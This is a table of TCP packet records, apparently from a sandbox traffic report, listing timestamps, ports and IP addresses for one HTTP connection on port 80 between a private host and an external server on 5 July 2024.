Jul 5, 2024 07:16:47.921242952 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.921252966 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.921262026 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.921273947 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.921283960 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.921293974 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.921299934 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.921310902 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.921322107 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.921329021 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.921654940 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.921689987 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.921700954 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.921711922 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.921721935 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.921734095 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.921751022 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.921916962 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.941524982 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.941551924 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.941564083 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.941652060 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.941668987 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.941745996 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.941756964 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.941766977 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.941778898 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.941822052 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.941822052 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.942014933 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942025900 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942035913 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942047119 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942056894 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942068100 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942086935 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.942193985 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.942266941 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942332983 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942342997 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942470074 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942480087 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942487955 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.942488909 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942502022 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942583084 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.942646980 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942739010 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942749023 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942759991 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942770004 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942780018 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942790031 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.942792892 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.942812920 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.942962885 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.943034887 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943046093 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943182945 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943193913 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943202019 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.943346977 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943357944 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943367958 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943377972 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943388939 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943408012 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.943423986 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.943727970 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943737984 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943747997 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943759918 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943768978 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.943770885 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943782091 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943792105 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943795919 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.943804026 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943814993 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943821907 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.943825006 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.943844080 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.943909883 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.944152117 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.944235086 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.944246054 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.944428921 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.944438934 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.944447994 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.944448948 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.944462061 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.944575071 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.944608927 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.944618940 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.944852114 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.008858919 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.008872032 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.008892059 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.008903980 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.008924961 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.008968115 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.008975983 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.008989096 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009001970 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009145975 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.009188890 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009207964 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009218931 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009229898 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009243011 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009259939 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009262085 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.009273052 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009277105 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.009336948 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.009586096 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009598017 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009609938 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009704113 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.009723902 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009736061 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009748936 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009927034 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009928942 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.009947062 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009958029 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009974957 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009984970 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.009996891 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.010011911 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.010020018 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.010152102 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.010301113 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.010438919 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.010474920 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.010485888 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.010498047 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.010509014 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.010523081 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.010535955 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.010548115 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.010555983 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.010565996 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.010579109 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.010586023 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.010659933 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.010710001 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.010987997 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.010999918 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.011012077 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.011023998 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.011035919 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.011048079 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.011059999 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.011069059 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.011115074 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.011285067 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.011367083 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.011379957 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.011390924 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.011404037 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.011415958 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.011434078 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.011435032 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.011693954 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.011774063 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.011785984 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.011797905 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.011811018 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.011974096 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.031691074 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.031733036 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.031744003 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.031797886 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.031864882 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.031874895 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.031888008 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032036066 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032109022 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.032195091 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032206059 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032215118 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032224894 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032236099 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032246113 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.032249928 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032260895 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032268047 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.032273054 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032362938 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.032612085 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032622099 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032632113 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032644987 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032663107 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.032694101 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.032901049 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032911062 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032921076 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032931089 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032939911 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032951117 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032969952 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032982111 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.032990932 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.033056974 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.033453941 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.033464909 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.033474922 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.033484936 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.033494949 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.033504963 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.033515930 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.033524036 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.033526897 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.033539057 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.033549070 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.033554077 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.033560038 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.033571005 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.033581972 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.033584118 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.033601046 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.033689022 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.034224033 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.034234047 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.034244061 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.034254074 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.034265041 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.034275055 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.034282923 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.034286976 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.034298897 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.034303904 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.034310102 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.034322023 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.034332037 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.034341097 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.034343004 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.034354925 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.034363985 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.034370899 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.034375906 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.034394026 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.034461021 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.034594059 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.098882914 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.098939896 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.098958969 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099009037 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.099060059 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099071980 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099082947 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099095106 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099145889 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.099350929 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099364042 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099421978 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099436045 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099445105 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.099524021 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099534988 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099545956 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099556923 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099569082 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099575996 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.099644899 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.099730015 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099749088 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.099827051 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099843979 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099972010 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099982023 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.099992037 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.099993944 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.100008965 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.100023031 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.100146055 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.100178957 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.100250006 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.100260973 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.100271940 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.100282907 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.100306034 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.100425959 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.100498915 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.100517035 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.100528002 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.100538969 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.100550890 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.100567102 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.100785971 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.100802898 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.100806952 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.100872040 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.101206064 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101226091 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101238012 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101300955 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.101373911 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101385117 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101394892 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101406097 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101429939 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.101600885 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101613045 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101669073 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.101716995 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101728916 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101739883 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101752043 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101757050 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101768970 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101778984 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101789951 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101793051 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.101804018 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.101824045 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.101880074 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.102201939 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.102214098 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.102225065 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.102338076 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.102346897 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.121539116 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.121551037 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.121645927 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.121670961 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.121706963 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.121721029 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.121879101 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.121896029 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.121907949 CEST	80	49176	172.232.56.138	192.168.2.22
